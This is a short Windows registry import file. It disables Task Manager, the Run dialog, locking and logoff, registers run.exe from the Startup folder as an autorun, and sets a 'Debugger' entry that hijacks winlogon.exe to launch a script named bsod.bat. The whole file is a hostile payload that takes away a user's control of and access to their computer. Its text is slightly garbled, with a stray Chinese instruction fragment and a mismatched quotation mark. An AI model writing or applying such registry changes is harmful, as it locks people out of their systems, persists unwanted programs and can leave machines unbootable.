Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 
"StartMenuLogOff"=dword:00000001
"NoRun"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 
"run"="%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp\run.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] 
"DisableLockWorkstation"=dword:00000001
"DisableTaskMgr"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting]下新建一个DWORD值
"DontShowUI"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe]
"Debugger"=“%appdata%\Linailnox\bsod.bat"